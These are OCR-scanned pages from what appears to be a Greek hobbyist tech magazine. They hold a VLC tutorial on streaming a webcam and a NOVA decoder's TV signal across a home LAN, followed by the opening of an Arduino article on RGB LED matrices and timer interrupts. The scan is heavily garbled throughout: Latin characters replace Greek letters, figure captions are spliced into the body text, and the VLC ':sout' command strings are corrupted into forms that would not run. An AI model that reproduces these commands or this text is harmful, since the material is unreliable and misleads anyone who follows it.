περίπλοκο λογισμικὀ. Χρειαζόμαστε µόνο £va laptop που θα αναλάβει το 
ρόλο του streaming server και µια κάμερα nou θα την αναγνωρίζει το 
VLC ως capture device (καλὸ εἶναι η κἀµερα να ἐχει και ενσωματωμένο 
μικρόφωνο). H κάμερα που χρησιμοποίησε ο γράφων ἠταν εκεἰνη του 
PlayStation 3, ενώ ο driver της ἦταν ο CL-Eye-Driver-5.0.1.0218. Av 0£- 
λουµε ὁλοι οι clients να µας βλέπουν στο τοπικὀ µας δίκτυο, πρέπει va 
ρυθµίσουµε rov router oore να υποστηρίζει multicast (αν δεν unoornpi- 
ζει, τότε δεν μπορεἰ να γίνει ταυτόχρονη εκπομπὴ σε πολλούς clients). Με 
βάση τα στάνταρ για τη μετάδοση multicast, oi διευθύνσεις πολλαπλής 
διανομής κυμαίνονται anó 224.0.0.0 μέχρι 239.255.255.255. 


Avoiyoupe TO VLC και πηγαίνουμε στο μενού Media. Επιλέγουµε Streaming 
--» Capture Device. Το Capture Mode το αφήνουμε oro DirectShow καὶ 
πειράζουμε ro Device Selection. Στο Streaming Server εμεὶς διαλέξαμε ro 
PS3Eye Camera, ενώ oro Audio device name ro USB Camera-B4.09.24.1. 
(βλ. εικόνα 3). Πατάμε Stream και μετὰ Next, φτάνοντας στο πεδίο 
Destinations. Anó την αναδυόμενη λίστα επιλἐγουµε το δικτυακὀ πρω- 
τὀκολλο που επιθυμούμε. Τα UDP αλλά και RTP / Mpeg Transport Stream 
αποτελούν δύο πολύ καλὲς επιλογἐς για realtime audio/video streaming. 
To Add εἶναι η αµέσως επόμενη επιλογή µας. Αν κάνουμε το streaming 


Εικόνα 4 

To αποτέλεσµα 
TOU streaming 

της κάµερας του 
PS3, απὀ rov 
streaming server 
rou Dell στον ACER 
netbook client. 
Όλα aurá εντός 
του τοπικού, ασὑρ- 
µατου δικτύου. 
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για ἑναν υπολογιστή (unicast), πληκτρολογούμε τη διεύθυνση του uno- 
λογιστὴ ὀπου ro stream θα «τερματίζει». Στη δικἠ µας περίπτωση, o VLC 
server ἐχει IP το 192.168.1.7, ενὼ ο client το 192.168.1.9. Αφήνουμε 
εξάλλου το προεπιλεγμένο port, δηλαδἠ το 5004, Στο profile έχουμε τη 
δυνατότητα ν΄ αλλάξουμε κωδικοποίηση σε εικὀνα και ἠχο -- αν το επι- 
θυμούμε. Εμεὶς επιλέξαμε H.264--AAC (MP4). Στο Miscellaneous Options 
διαλέγουµε Stream all elementary streams kai oro SAP announce nàn- 
κτρολογούμε το ὀνομα του stream (n.x., dr8g). H γενικἡ μορφὴ rou 
output string θα ἐχει την ακόλουθη µορφή: 


:sout-itranscode(vcodec-h264, vb-0, scale-0,acodec-mp4a, ab-128,c 
hannels-2,samplerate-44100):rtp(dst-192.168.1.9,port-5004,mux- 
ts) :sout-rtp-sap :sout-rtp-name-dr()gg :sout-standard-sap :sout- 
standard-name-dr(g :sout-standard-group- :sout-all :ttl-1 :sout- 
keep 


(Z.r.A. Ta strings aurá χρησιμεύουν órav θέλουμε να δουλέψουμε το 
VLC anó την command line. Δείτε το www.videolan.org/doc/streaming- 
howto/en/ch04.html για περισσότερα παραδείγματα.) Επιτέλους, küvou- 
µε κλικ στο Stream. Και vai, δημιουργήσαμε το πρὠτο µας UStream, 
χωρίς ro UStream, σε ἑναν υπολογιστή! (βλ. εικόνα 4). Να τονίσουμε εδὠ 
ὁτι παρατηρείται µια καθυστέρηση του stream σε σχέση µε τη πραγµατι- 
κὴ μετάδοση -- κι αυτό εἶναι φυσιολογικό κι αναμενόμενο. Το αποτέλεσµα 
TOU streaming όμως εἶναι στρωτὀ και ομοιόμορφο, αφού η καθυστέρη- 
ση εἶναι σταθερἠ. Όπως αναφέραμε πριν λίγο, αν ο router µας υποστη- 
ρἰζει multicast τότε επιλέγοντας µια διεύθυνση anó 224.0.0.0 μέχρι 
239.255.255.255, μπορούμε va μεταδώσουμε εικὀνα και ἦχο σε πολλούς 


Πώς va streamápeve τα panda όλα! 
| 


Πο 


υπολογιστὲς του LAN. Μια γενικὴ µορφή output string απὀ multicast µε- Εικόνα 5 
τάδοση, εἶναι η ακόλουθη: H τηλεόραση συν- 

δέεται µέσω HDMI, 
:sout-irtp(mux-ts,dst-239.255.0.1,sap,namez'video"):sout- απὀ την ἐξοδο 


transcode-soverlay-0 TOU αποκωδικο- 

ποιητή. To scart 
' : m" σε component 
Eva streaming της NOVA pou, παρακαλώ! XOADBIOHOU 
χρησιμοποιούμε 


Αφού µε το VLC μπορούμε να κάνουμε ευέλικτο streaming, τότε yiari πιο ποσα 


να µη γίνεται va στἐλνουµε το σήμα της τηλεόρασης στο τοπικὀ δίκτυο; της ΝΟΝΑ σπο- 
Αλήθεια, αν έχουμε NOVA, γίνεται να την streamápoups κι αυτή; Ma, φυ- κωδικοποιημένο, 
σικἀ και γίνεται! Πα αρχή, χρειαζόμαστε τον ακόλουθο εξοπλισμό: στην εἰσοδο του 
. capture device. To 

e 'Evav αποκωδικοποιητἠή NOVA. δε VLC αναλαμ- 

: A , : βάνει καθήκοντα 

e Έναν υπολογιστή σε ρὀλο streaming server. streaming server, 

: i ; διαμοιράζοντα: 

e Ἕνα καλώδιο HDMI σε Component ἢ Scart σε Component ἢ HDMI τη , ο. 

σε HDMI (το επιλέγουμε ανάλογα µε την εἰσοδο nou ἐχει το capture στις συσκευές TOU 
device, βλ. παρακάτω). τοπικού δικτύου. 


ο Ένα hardware capture device, δηλαδὴ µια κατάλληλη καρτούλα 
TV. Ψάχνουμε στο Internet για συσκευές που υποστηρίζει το VLC, 
προκειµένου va υλοποιεί τη σύλληψη του σήματος στην ἐξοδο του 
αποκωδικοποιητή. Ενδεικτικἀ, δείτε σε κἀποιο e-shop για κάρτες 
της AverMedia, LifeView κ.ά. Πα HD σήμα σημειώστε ὁτι, κατὰ KA- 
vóva, θέλουμε ακριβότερο capture device. 
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Εικόνα 6 

O χρήστης του 
ACER netbook 
client απολαμβάνει 
NOVA cinema 2 

-- χάρη aro VLC! 
To σήμα της NOVA 
εἶναι ασύγχρονο 
anó rov server 
στον client, λόγω 
της καθυστέρησης 
που εισάγει TO 
ασύρματο δίκτυο. 
Στην πλειονότητα 
των περιπτώσε- 
ων auró σημαίνει 
καθυστέρηση σε 
σχέση µε την πηγή, 
όχι προβληματικό 
playback. 
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Ξεκινώντας, ρυθµἰζουµε προαιρετικἀ τον router µας *av* θέλουμε EK- 
πομπὴ multicast. Συνδέουµε το καλώδιο HDMI ἡ ro Scart στην ἐξοδο 
του αποκωδικοποιητή της NOVA απὀ τη pia και στην εἶσοδο του capture 
device anó την ἄλλη. Στη δικἠ µας περίπτωση δεν εἰχαμε HD εἰσοδο, onó- 
τε συνδέἑσαµε το Scart του αποκωδικοποιητἠ µε το RCA της κάρτας TV 
(capture device, βλ. εικόνα 5). Το σηµαντικὀ όλου του εγχειρήματος εἰναι 
να αναγνωρίσει o VLC το capture device. Ανοίγουμε ro VLC και δίνουμε 
Media --» Streaming. Εστιάζουμε την προσοχἠ µας στο Capture Device. 
Εκεὶ, ανάλογα µε τη συσκευἠ µας, θα δούμε διαφορετικἁ αποτελέσµατα 
στις περιοχὲς Capture mode, Video device name και Audio device name. 
Οι £niAoy£g εἶναι: 


Capture mode-DirectShow, Video device name-"capture device name", 
Audio device name-"capture device name" 


Πατάμε Stream --» Next κι επιλέγουμε μέθοδο για να γίνει ro streaming. 
Ενδεικτικἁ, διαλέγουµε ἑνα εκ των UDP, RTP, καθὼς και το Active 
Transcoding H.264--AAC (MP4). Αυτού του εἰδους ro transcoding εἶναι 
ιδιαἰτερα επιθυµητὀ av θέλουμε va γίνεται streaming σε iPhone ἠ/και 
iPad, αφού xopic Jailbreak οι συσκευές αυτές αναγνωρίζουν μόνο MP4 
video. Πατάμε στο Add και στο πεδίο Address γράφουμε τη διεύθυνση 
που θέλουμε να φτάσει το NOVA stream. Εμεὶς, π.χ., βάλαμε 192.168.1.9 
(£va ACER netbook) και yia port αφήσαμε ro 5004. Συνεχίζουμε µε Next 
και στο SAP announce πληκτρολογούμε ro ὀνομα rou stream (n.x., nova -. 
stream). To unicast generated stream output string µε transcoding, έχει 
την ακόλουθη µορφή: 


Πώς va streamápeve τα panda όλα! 
ri 


:sout-ittranscode(vcodeczh264, vb-0, scale-0,acodec-mp4a,ab-128,c 
hannels-2,samplerate-44100):rtp(dst-192.168.1.9,port-5004,mux- 
ts) :sout-rtp-sap :sout-rtp-name-nova stream :sout-standard-sap 
:sout-standard-name-nova stream :sout-standard-group- :ttl-1 
:sout-keep 


Το δε multicast generated stream output string µε transcoding, εἶναι: 


:sout-ittranscode(vcodeczh264, vb-0, scale-0,acodec-mp4a,ab-128,c 
hannels-2,samplerate-44100):rtp(mux-ts,dst-239.255.0.1) :sout- 
rtp-sap :sout-rtp-name-multicast nova stream :sout-standard-sap 
:sout-standard-name-multicast nova stream :sout-standard-group- 
:ttl-1 :sout-keep 


Έχουμε τελειώσει µε την προετοιμασία στον VLC streaming server. Na- 
τάμε στο Stream. Τώρα, αν η τηλεόραση που ἐχουμε σε κάποιο ἆλλο 
δωμάτιο υποστηρίζει WiFi, τότε µέσα απὀ το πρωτόκολλο HTTP μπορού- 
µε να λάβουμε ro nova, stream. Εμάς δεν υποστήριζε WiFi, γι’ αυτὀ ως 
client πήραμε ¿va netbook. Αυτό που κάνουμε για να δούµε NOVA εἶναι να 
ανοΐξουμε το VLC και μέσα anó την playlist να επιλέξουμε Local Network 
--» SAP announcement. Περιμένουμε λίγο κι εµφανίζεται το ὀνομα της 
ροἠς δεδομένων nova, stream. Επιλἐγοντάς το μπορούμε να δούμε NOVA 
στο netbook! (βλ. εικὀνα 6). Πρέπει v’ αναφέρουμε ori av το δίκτυο εἶναι 
ασύρματο, τότε μοιραία εισάγεται µια καθυστέρηση στην προβολἠ του 
περιεχομένου. Επειδἠ όμως η καθυστέρηση εἶναι ομοιόμορφη yia όλα τα 
μεταδιδόμενα πακέτα, ουσιαστικά δεν τίθεται σοβαρὀ πρόβλημα. Γενικά, 
πάντως, πρέπει να προσέχουμε τι πρωτόκολλο χρησιμοποιούμε. 


Νομίζουμε ὁτι, µετά τα προηγούμενα, ποτὲ δεν θα ξαναδεἰτε ro VLC όπως 
παλιά. Κι av έχουμε δίκιο, τότε αυτό εἶναι πολὺ καλὸ ;) 
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Οι εξωγἠινες μορφὲς anó ro space invaders 
ἔχουν το γούστο τους, ὁπως και να TO Küvoups. 


H χρήση £vóc ἐγχρωμου matrix εἶναι επίσης i 
Skill: ευπρόσδεκτη, ανοίγει και το δρόμο για πολλὲς gn 

Intermediate | H£AAOVTIK£G κατασκευές. Το περισσότερο 

ue ενδιαφέρον, όμως, συγκεντρώνεται στα | 
interrupts, ISR, interrupts. Μεταξύ άλλων, η χρήση τους 

RGB LED matrix, ! επιτρέπει την επανάληψη διαφόρων εργασιών I 

timer, coun ; l µε μεγάλη ακρίβεια, όπως επἰσης την επίτευξη | 

prescaler, CIC 4 " 
| TOU multitasking! 1 


DOE) A 


* ro Κικανοποιεί τη σχέση k^2-A^2 >= 2Κλ 
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Στο προηγούμενο μέρος της σειρἁς µας, oro deltaHacker 005, κατασκευ- 
ἀσαμε δύο παιχνίδια γύρω απὀ ἑνα μονοχρωματικὀ LED matrix 8x8. Au- 
τὲς οἱ μικρὲς οθὀνες διαθέτουν 16 ακροδέκτες: οκτώ για τις γραμμὲς κι 
OKTO για TIG στήλες. Ωστόσο, yia τη διασύνδεση rou matrix στα δικἁ µας 
κυκλώματα καταφέραμε να χρησιμοποιήσουμε μόνο τρεις ακροδέκτες 
του Arduino. Αυτό ro πετύχαµε µε τη βοήθεια ενὀς μικρού και πολύ δια- 
δεδομένου roin. O λὀγος γίνεται για το 74HC595, το οποίο αποτελεἰ ἑναν 
shift register. Κάπως £roi, εἰχαμε την ευκαιρία να μιλήσουμε για τη γενι- 
κὀτερη λειτουργία των shift register, καθώς και yia ra ιδιαίτερα χαρακτη- 
ριστικἀ του συγκεκριμένου τσιπ. Μετά απὀ αυτή τη γνωριμία περάσαμε 
στο Software κι εκεἰ τα πράγματα ἐγιναν πιο ενδιαφἐροντα. Ta προγράμ- 
para που μελετήσαμε ακολουθούσαν τη λογικἠ µε την οποία γράφονταν 
τα παλιά παιχνίδια: H ρουτίνα σάρωσης της οθόνης αποτελούσε το κύριο 
μέρος του προγράμματος, ενώ οι υπόλοιπες λειτουργίες (σχεδίαση νέων 
frame, ἐλεγχος πλήκτρων κ.λπ.) εἶχαν στηθεἰ «περιφερειακά». Η µελέτη 
αυτών των προγραμμάτων μὰς ἐφερε σε enag µε την ἐννοια rou frame 
buffer, αλλά και µε αρκετά ευρηματικὰ κολπάκια yia TO συγχρονισμὸ των 
επιµέρους λειτουργιών. Κάπου £00, ὅμως, πρέπει να οµολογήσουμε κάτι: 
Τα προγράµµατα nou εἶδαμε rjrav γραμμένα µε απλοϊκὸ τρὀπο και εἶχαν 
Ἀτεράστια” περιθώρια βελτίωσης. Αναρωτιέστε τι θα μπορούσε να ἐχει 
γίνει µε διαφορετικὀ τρόπο; 


Εξέλιξη 


Εἰναι σίγουρο ὁτι θα ἐχετε ακούσει τον ópo scan rate. Αναφέρεται στο 
ρυθμό µε τον οποίο προβάλλεται ¿va frame επάνω στην οθόνη µας. Με 
ἄλλα λόγια, το scan rate αποτελεί τη συχνότητα ανανέωσης της οθὀνης 
και πολύ συχνὰ αναφέρεται σαν refresh rate. Άραγε, θα μπορούσαμε 
να υπολογίσουμε το scan rate για τα δύο παιχνιδάκια µας; Όσο κι αν το 
προσπαθήσουμε, θα αποτύχουμε! Βλέπετε, avà 40 σαρὠώσεις του matrix 
ξεκινούσε η σχεδίαση ενὀὸς νέου frame. H επόμενη σάρωση της οθόνης 
επαναλαμβανόταν *uerá* απὸ τη σχεδίαση. Με ἆλλα λόγια, ο ρυθμός 
σάρωσης δεν ἧταν απόλυτα σταθερὸς και εξαρτιόταν anó το χρόνο εκτέἑ- 
λεσης των ενδιάμεσων διαδικασιών. Αν όλα αυτά σας ακούγονται πολύ 
θεωρητικἁ κι αδιάφορα, σκεφτείτε την εξἠς απλούστατη συνέπεια: Στην 
περίπτωση nou το παιχνίδια µας ἦταν πιο σύνθετα kai η σχεδίαση κάθε 
frame διαρκούσε περισσότερο, η εικὀνα θα «ἐσπαγε» και θα παρατηρού- 
caus στην οθόνη µας το λεγόμενο flickering! Να µας συγχωράτε, αλλά 
εμεὶς δεν μπορούμε va ανεχτούμε κάτι τέτοιο ;) 


Στο παρὀν άρθρο θα μελετήσουμε µια εξελιγμένη εκδοχἠ της npoypau- 
ματιστικὴς μηχανὴς, την οποία συναντήσαμε στα δύο παιχνίδια του npo- 
ηγούμενου ἄρθρου. Καταρχάς, θα επεκτεἰνουµε τα frame buffer ὡστε va 
Φιλοξενούν πληροφορίες για το χρώμα κάθε pixel, ενώ θα δούμε κι vav 
τρὀπο yia την εξοικονόμηση μνήμης RAM. H πιο ενδιαφέρουσα βελτἰω- 
ση, όμως, αφορά στη σταθερότατη επανάληψη της σάρωσης της οθόνης. 
Βλέπετε, για να πετύχουμε αυτού rou εἰδους την ακρίβεια θα επιστρα- 
τεύσουμε τα περίφημα interrupts του Arduino. Συγκεκριµένα, θα xpn- 
σιμοποιήσουμε ἑνα timer interrupt, αλλά όλα αυτά θα τα συζητήσουμε 
αναλυτικὀτατα σε λίγο... 


Προσθήκη υλικού 


Πριν προχωρήσουμε στη μελέτη όσων υποσχεθήκαμε, πρέπει να µιλἠ- 
σουµε για το hardware στο οποίο θα στηριχτεί το βελτιωμένο µας npó- 
γραμμα. Βλέπετε, ο κὠδικας θα διατηρεί πληροφορίες yia το χρώμα κάθε 
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pixel κι αυτό θα ἦταν ανούσιο, av εξακολουθούσαµε va παϊζουµε µε µια 
µονόχρωμη οθὀνη. M αυτό το λὀγο, αποφασίσαμε va στραφούμε σ’ ἑνα 
RGB LED matrix 8x8. Σε αυτὲς τις διατάξεις, πίσω απὀ κάθε κουκκἰδα 
βρίσκεται ¿va κὀκκινο, ἑνα μπλε κι ἑνα πράσινο LED. Έτσι, κάθε κουκκἰδα 
μπορεἰ να εμφανίζει ἑνα απὀ τα τρία χρώματα ἡ κἄποιο συνδυασμὀ τους! 
Ὅπως υποψιάζεστε, αυτά τα matrix ἐχουν περισσότερους ακροδέκτες. 
Συγκεκριμένα, διαθέτουν οκτώ για τον ἐλεγχο των γραμμών και ἄλλους 
24 yia τον ἐλεγχο των στηλὠν:. Εφόσον ká8e κουκκἰδα ενσωματώνει τρία 
LED, κάθε στήλη σχηματίζεται απὀ τρεις γραμμές (pia για κἆθε χρώμα). 
Έτσι, τα RGB LED matrix 8x8 διαθέτουν 32 ακροδέκτες. Προφανώς, yia 
τη σύνδεση επάνω oro Arduino θα επιστρατεύσουμε και πάλι μερικούς 
shift registers. Αυτή τη φορά, όμως, δεν θα αρκεστούµε σε δύο τσιπάκια. 
Θα χρησιμοποιήσουμε ἑνα για τον ἐλεγχο των γραμμών2 και άλλα τρἰα για 
τον ἐλεγχο των στηλῶν. Πα τη διασὺὑνδεσή τους θα ακολουθήσουμε την 
τοπολογἰα που συναντήσαμε και στο προηγούμενο κύκλωμα (ονομάζεται 
Daisy Chain): H εἰσοδος του καθενὸς θα τροφοδοτείται µε δεδοµένα anó 
τη σειριακὴ ἐξοδο του προηγούμενου, ενώ το πρὠτο στη σειρὰ τσιπάκι θα 
τροφοδοτεἰται µε δεδομένα anó το Arduino. Εν ολἰγοις, oi shift registers 
θα συνδεθούν αλυσιδωτά. 
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Μετάθεση στο software 


To νέο κύκλωμα εἶναι σαφώς μεγαλύτερο, αλλά δεν περιλαμβάνει νέα 
στοιχεία. Αυτό δεν σηµαίνει ότι εἶναι αδιάφορο! Καταρχάς, σκεφτείτε ὁτι 
κάθε φορά που ενεργοποιείται µια γραμμή του matrix, ενεργοποιούνται 
24 LED (rpia για κάθε κουκκἰδα). Ὅμως, yia την ταυτόχρονη λειτουργία 
τόσων LED απαιτείται ἈπολύἈ περισσότερο ρεύμα απὀ αυτό που pno- 
pei να δώσει ἡ να δεχτεἰ µια έξοδος των shift registers. Επομένως, ο 
shift register nou ενεργοποιεἰ και απενεργοποιεἰ ολόκληρες γραμμὲς του 
matrix θα ἦταν αδύνατο να αντεπεξέλθει στις απαιτήσεις του κυκλώ- 
ματος. Πα να ξεπεράσουμε aurr| την αδυναμία, θα μπορούσαμε να xpn- 
σιμοποιήσουμε πρὀσθετο hardware. Συγκεκριµένα, θα μπορούσαμε να 
επιστρατεύσουμε τσιπ που ενσωματώνουν ειδικὲς διατάξεις τρανζίστορ” 


1. Θα μπορούσε να ισχυριστεί κανείς ὁτι διαθέτουν οκτώ ακροδέκτες για τις στήλες και 24 για τις γραμμὲς, 
χωρὶς να ἐχει ἁδικο! Βλέπετε, το πώς ορίζονται οἱ γραμμὲς και οι στήλες ἐχει να κάνει µε το πὠς το κρατάμε ;) 
2. Συγκεκριμένα, για τη διαδοχικἠ ενεργοποίηση καθεμιάς anó τις γραμμές. 

3. Ονομάζονται darlington arrays kai οι πλέον καθιερωμένες υλοποιήσεις εἶναι ra ULN2804 και UDN2981. 


Εικὀνα 1 

Αυτή τη φορά Xpn- 
σιμοποιήσαμε éva 
RGB LED matrix. Ta 
matrix αυτού του 
εἶδους nepiAaupá- 
νουν ÉVA KÓKKIVO, 
éva πράσινο ΚΙ éva 
μπλε LED, μέσα 
σε κάθε κουκκί- 
δα τους. Όπως 
αντιλαμβάνεστε, 
αυτή η αύξηση 
στο πλήθος των 
LED συμπαρασύ- 
ρει καὶ το πλήθος 
των ακροδεκτών 
του matrix. 'ETOI, 
η µικρή οθόνη 

που φαίνεται στην 
εικόνα, διαθέτει 32 
ακροδέκτες! 


b" 5 


Εικόνα 2 

Ένα µέρος απὀ 

TO εσωτερικὀ 
κύκλωμα ενός RGB 
matrix. H συγκε- 
κριμένη υλοποίηση 
εἶναι τύπου CA 
(Common Anode). 
Αυτό σημαίνει ότι 
ra LED σε κάθε 
κουκίδα έχουν 
συνδεδεμένες 
μεταξύ τους τις 
ανόδους. Όπως 
φαντάζεστε, υπἀρ- 
χουν kai matrix τύ- 
που CC (Common 
Cathode), στα 
οποία ra LED κάθε 
κουκκίδας £xouv 
συνδεμένες μεταξύ 
τους τις καθόδους. 
Πάντως, ra matrix 
CA εἶναι περισσὀ- 
τερο διαδεδομένα. 
Πα την ενεργοποίη- 
ση µιας γραμμής σε 
ένα τέτοιο matrix, 
αρκεί να δώσου- 
µε 5V (το λογικό 
HIGH) στον avri- 
στοιχο ακροδέκτη. 
Στη συνέχεια, για 
την ενεργοποίηση 
κάποιων subpixel 
της γραμμής, αρκεί 
να δώσουμε Ον 

(το λογικό LOW) 
στους αντίστοιχους 
ακροδέκτες. 
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και μπορούν να αυξήσουν ro διερ- 
χόμενο ρεύμα. Ωστόσο, προτιμή- 
caue µια απλούστερη και οικονο- 
µικότερη λύση :D Σχεδιάσαµε το 
software κατὰ τέτοιο τρόπο, ὥστε 
κάθε φορά να ενεργοποιούνται το 
πολύ οκτὠ LED. Έτσι, κάθε φορά 
που ενεργοποιείται µια γραμμὴ, 
ανάβουν πρὠτα ra κὀκκινα subpixel 
κάθε κουκκἰδας, στη συνέχεια τα 
πράσινα και τέλος τα μπλε. Φυσικά, 
aut η εναλλαγή πραγματοποιείται 
εξαιρετικἁ γρήγορα, ώστε να µην 
εἶναι αντιληπτὴ απὀ το μάτι µας. 
Έτσι, σε κάθε κουκκἰδα εμφανίζο- 
νται τα χρώματα ἡ οι συνδυασμοὶ 
τους, EVO στην πραγματικότητα TG 
subpixel ανάβουν διαδοχικὰἁ και όχι 
ταυτόχρονα. 


Μία ακόµα ενδιαφἐρουσα λεπτομµέ- 
ρεια του hardware σχετίζεται µε το 
LED matrix: Ta LED διαφορετικού 
Χρώματος, ἐχουν διαφορετικἠ φω- 
τεινότητα. Συγκεκριµένα, τα πράσινα LED εἶναι πιο φωτεινά anó ra μπλε, 
τα οποία µε τη σειρἁ τους εἶναι πιο φωτεινά απὀ τα κὀκκινα. Επιπρόσθετα, 
ενώ τα μπλε και τα πράσινα LED ἐχουν την ἴδια τάση λειτουργίας, ενώ 
τα κὀκκινα ἐχουν μικρότερη. Αυτό συνεπάγεται ὁτι αν χρησιμοποιήσουμε 
τις ἰδιες αντιστάσεις προστασίας για όλα τα LED, τα kókkiva θα δέχονται 
περισσότερο ρεύμα”. H αὐξηση του ρεύματος, ὁμως, ἐχει σαν anor£Ae- 
oua την αὐξηση της φωτεινότητας. Σε auró το σημείο, θα μπορούσε va 
υποθέσει κανεὶς TI το πρὀβλημα στην ανομοιομορφία της φωτεινότητας 
μπορεί va λυθεἰ µε την κατάλληλη επιλογἡ αντιστάσεων. Ωστόσο, η φω- 
τεινότητα ενὸς LED καθορἰζεται κυρίως anó εγγενή χαρακτηριστικἁ (το 
μίγμα των υλικών TOU), EVO η σχέση μεταξύ φωτεινότητας και ρεύμα- 
τος δεν εἶναι γραμμικὴ! M αυτούς τους λόγους χρησιμοποιήσαμε τις ἴδιες 
αντιστάσεις για κάθε χρώμα και µεταθἑἐσαµε το πρόβλημα της φωτεινό- 
τητας στο software. Τη σχετική λύση θα τη δούμε αργότερα. Τώρα που 
ξεμπερδέψαμε µε τις ιδιαιτερότητες rou hardware, μπορούμε επιτέλους 
να προχωρήσουμε στο software kai στα interrupts! 


Τι εἶναι ra interrupts; 


Σε γενικὲς γραμμές, τα interrupts αποτελούν σήματα τα οποία διακὀ- 
πτουν τη «φυσιολογική» po εκτέλεσης ενὸς προγράμματος. Όταν ενερ- 
γοποιείται ἑνα interrupt, o επεξεργαστἠς σταματάει την τρέχουσα εργα- 
cia του κι αρχίζει va εκτελεἰ ἑνα νέο κομμάτι κὠδικα. Μόλις ολοκληρωθεί 
η εκτέλεση αυτού του κὠδικα o επεξεργαστἠς επιστρέφει στην npon- 
γούμενη εργασία του και συνεχίζει την εκτἐλεσἠ της κανονικἀ. Με άλλα 
λόγια, η ενεργοποίηση ενὸς interrupt σηµατοδοτεὶ την αυτόματη κλἠ- 
ση µια ειδικής συνάρτησης. Αυτὲς οι συναρτήσεις ονομάζονται Interrupt 
Handling Routines ἡ Interrupt Service Routines (ISR). Τα πιθανά aitia για 


4. AUTÒ το συμπέρασμα προκύπτει απὀ την εφαρµογἡ rou νόµου rou Ohm, αλλά η µελέτη ToU ouykekpipėvou 
νόμου ξεφεύγει anó το θέµα µας. Εμπιστευθεἰτε µας. 
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την ενεργοποἰηση ενός interrupt εἶναι πολλά”. Αντίστοιχα, τα interrupts 
εἶναι επίσης πολλά και διαφοροποιούνται ως προς το αἶτιο nou npoka- 
λεὶ την ενεργοποίηση του καθενὸς. Φυσικά, για κάθε interrupt υπάρχει 
και µια ξεχωριστή ISR. Έτσι, ο προγραμματιστἠὴς μπορεὶ να σχεδιάσει 
£va πρὀγραμμα το οποίο θα αποκρἰνεται ταχύτατα και εὐστοχα σε κάθε 
συνθήκη που προκύπτει κατά την εκτἑλεσὴ του. Περιττό να πούμε ὁτι TO 
Arduino διαθέτει πάρα πολλά interrupts! Αναρωτιέστε ποια εἶναι αυτά; 


H ολοκλήρωση ká8e εργασἰας, σε κάθε περιφερειακὀ που ενσωματώνει 
o επεξεργαστἠς του Arduino, µπορεί να προκαλέσει κι απὀ &va interrupt. 
Έτσι, υπάρχουν interrupt που ενεργοποιούνται όταν ολοκληρώνεται η 
αποστολἠ ενὸς πακέτου δεδομένων απὀ τη σειριακἠ θύρα ἡ ro SPI, όταν 
ολοκληρώνεται uia μετατροπή στο κύκλωμα ADC, όταν ἑνας μετρητἠς 
φτάνει σε kànoia προκαθορισμένη τιμή και πάει λέγοντας. Επιπρόσθετα, 
το Arduino διαθέτει και µια σειρά interrupts, τα οποία ενεργοποιούνται 
όταν μεταβάλλεται η λογικἠ κατάσταση σε συγκεκριμένους ακροδέκτες 
τους. Βέβαια, η πλήρης καταγραφἡ kar επεξήγηση των interrupts του 
Arduino θα απαιτούσε πολλὲς σελίδες, κι εξάλλου ξεφεύγει anó το θέμα 
μας. Στη συνέχεια, λοιπὸν, θα εστιάσουµε στα timer interrupts. Πρόκειται 
για ra interrupts µε ro ευρύτερο πεδίο εφαρμογών, τα οποία χρησιμοποι- 
οὗνται yia την υλοποίηση συστημάτων multitasking, καθὼς και σε πολλὲς 
ἄλλες εργασίες οι οποίες απαιτούν αυστηρή περιοδικὀτητα. H ενεργο- 
ποίηση των συγκεκριμένων interrupts συνδέεται µε τη λειτουργἱα συ- 
γκεκριμένων περιφερειακών του Arduino, τα οποία ονομάζονται timers, 
counters ἡ απλά μετρητές. 


Προγραμματιζόμενα kokópia! 


Αναρωτιέστετι εἶναι οι μετρητές; Μπορείτε va τους φαντάζεστε σαν απλά 
χρονόμετρα ἡ, ακόµα καλύτερα, σαν ξυπνητήρια! Με αυτούς τους unxa- 
νισμοὺς μπορούμε να προσδιορἰσουμε κάποια χρονικὴ στιγμὴ στο μὲλ- 
λον, ὁπου θα εκτελεστεὶ éva interrupt. Όταν φτάσει αυτή η στιγµή o 
μετρητἠς θα ενεργοποιήσει το κατάλληλο interrupt κι αυτὀ µε τη σειρὰ 
του θα προκαλέσει την εκτέλεση της αντίστοιχης ISR. 


Ουσιαστικά, οι μετρητὲς ασχολούνται κυρίως µε την αὐξηση της τιμής 
ενὸς ειδικού καταχωρητή (timer/counter register), σε τακτά χρονικὰ δια- 
στήματα. Αυτός ο καταχωρητἠὴς ενδέχεται να ἐχει μῆκος 8 rj 16bit και το 
μἐγεθόὸς του αποτελεἰ ἑνα απὀ ra βασικἁ χαρακτηριστικἁ των μετρητών. 
To Arduino, βλέπετε, δεν διαθέτει ἐναν µετρητή, αλλά τρεις! Προφανώς, 
κάθε μετρητἠς μπορεὶ να μετρήσει μέχρι µια συγκεκριμένη τιµή, η onoia 
καθορίζεται anó το μήκος του timer/counter register (2^8 ἡ 2516). Όταν 
O μετρητής φτάσει στη μέγιστη τιµή πραγματοποιείται η λεγόμενη υπερ- 
χείλιση κι αρχίζει να μετράει ξανὰ anó το μηδὲν. Οι μετρητὲς μπορούν va 
ρυθμιστούν κατάλληλα, ὡστε να παράγουν va interrupt όταν υπερχειλὶ- 
ζουν ἡ όταν φτάνουν σε κἀποια συγκεκριμένη τιμή. 


Η χρησιμότητα των μετρητών 


Επάνω στους μετρητὲς και στα αντίστοιχα interrupt στηρἰζονται αρκε- 
τὲς βασικἐς διαδικασίες και δυνατότητες του Arduino. Επομένως, κατὰ 
τη χρήση των μετρητών πρέπει va εἱμαστε ιδιαίτερα προσεκτικοί. Συ- 
γκεκριμένα, πρέπει va έχουμε υπόψη µας ποιος μετρητὴς σχετίζεται µε 
ποια λειτουργία, oore να γνωρϊζουµετις συνέπειες απὀ τη χρήση του. H 
αντιστοιχία μετρητών και λειτουργιών φαίνεται στον ακόλουθο πίνακα: 


5. Παρεμπιπτόντως, να πούμε ὁτι το αἰτιο ενός interrupt ονομάζεται interrupt source. 
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Αναλογικἠ ἑξοδος 
(PWM) 


Μετρητής Διαδικασία 


timer/counter 1 | Όλες στη βιβλιοθήκη servo Pin 9 και pin 10 
timer/counter 2 Pin 3 kai pin 11 


Ὅπως εἰναι φανερὀ, av χρησιμοποιήσουμε το uerpnrr| timer/counter 0, 
οι συναρτήσεις delay και millis θα πάψουν να λειτουργούν σωστά, EVO 
ενδέχεται va παρέμβουν στη ρύθμιση του μετρητή. Επομένως, η χρήση 
τους θα ἐχει απρὀσµενες συνέπειες στο πρὀγραμμὰ µας και πρέπει να 
αποφευχθεί! To ἰδιο ισχύει και για τις εξὀδους PWM, στους ακροδέκτες 
